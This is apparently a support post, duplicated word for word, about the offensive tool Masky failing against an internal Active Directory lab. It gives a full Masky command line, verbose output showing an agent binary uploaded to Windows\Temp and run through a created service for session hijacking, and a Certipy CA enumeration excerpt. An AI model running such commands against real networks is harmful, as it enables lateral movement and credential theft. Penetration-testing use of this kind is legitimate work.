Hi,
trying to access the tool for future pentests after the nice podcast but so far no success (yet)
FYi : The host 192.168.16.4 has no AV
$masky -d timatec -u fbu -p 'xxx' -dc-ip 192.168.16.11 -ca "DC01.timatec.local\timatec-DC01-CA" 192.168.16.4 -v
...
[] Loading options...
[] 1 target(s) loaded
[o] Initialization of the threadpool (size: 1)
[o] (192.168.16.4) Start of target processing
[o] (192.168.16.4) The Masky agent binary will be uploaded in: \Windows\Temp\wydxnkqo.exe
[o] (192.168.16.4) The Masky agent output will be stored in: \Windows\Temp\kwkcqilt.jpg
[o] (192.168.16.4) The Masky agent errors will be stored in: \Windows\Temp\rxqgmhcr.png
[+] (192.168.16.4) Current user seems to be local administrator, attempting to run Masky agent...
[o] (192.168.16.4) Masky agent was successfuly uploaded in: '\Windows\Temp\wydxnkqo.exe'
[o] (192.168.16.4) The service 'ocrooivu' was successfuly created
[o] (192.168.16.4) The 'ocrooivu' was restarted for command execution
[×] (192.168.16.4) The provided CA server seems to be invalid or unreachable, please check its value
[o] (192.168.16.4) The 'ocrooivu' service binary path has been removed
[] (192.168.16.4) No user session was hijacked
[o] (192.168.16.4) End of target processing
[] Exiting...
I've used : -ca "DC01.timatec.local\timatec-DC01-CA"
From Certipy:
more 20221024092059_Certipy.txt
Certificate Authorities
0
CA Name : timatec-DC01-CA
DNS Name : DC01.timatec.local
Hi,
trying to access the tool for future pentests after the nice podcast but so far no success (yet)
FYi : The host 192.168.16.4 has no AV
$masky -d timatec -u fbu -p 'xxx' -dc-ip 192.168.16.11 -ca "DC01.timatec.local\timatec-DC01-CA" 192.168.16.4 -v
...
[] Loading options...
[] 1 target(s) loaded
[o] Initialization of the threadpool (size: 1)
[o] (192.168.16.4) Start of target processing
[o] (192.168.16.4) The Masky agent binary will be uploaded in: \Windows\Temp\wydxnkqo.exe
[o] (192.168.16.4) The Masky agent output will be stored in: \Windows\Temp\kwkcqilt.jpg
[o] (192.168.16.4) The Masky agent errors will be stored in: \Windows\Temp\rxqgmhcr.png
[+] (192.168.16.4) Current user seems to be local administrator, attempting to run Masky agent...
[o] (192.168.16.4) Masky agent was successfuly uploaded in: '\Windows\Temp\wydxnkqo.exe'
[o] (192.168.16.4) The service 'ocrooivu' was successfuly created
[o] (192.168.16.4) The 'ocrooivu' was restarted for command execution
[×] (192.168.16.4) The provided CA server seems to be invalid or unreachable, please check its value
[o] (192.168.16.4) The 'ocrooivu' service binary path has been removed
[] (192.168.16.4) No user session was hijacked
[o] (192.168.16.4) End of target processing
[] Exiting...
I've used : -ca "DC01.timatec.local\timatec-DC01-CA"
From Certipy:
more 20221024092059_Certipy.txt
Certificate Authorities
0
CA Name : timatec-DC01-CA
DNS Name : DC01.timatec.local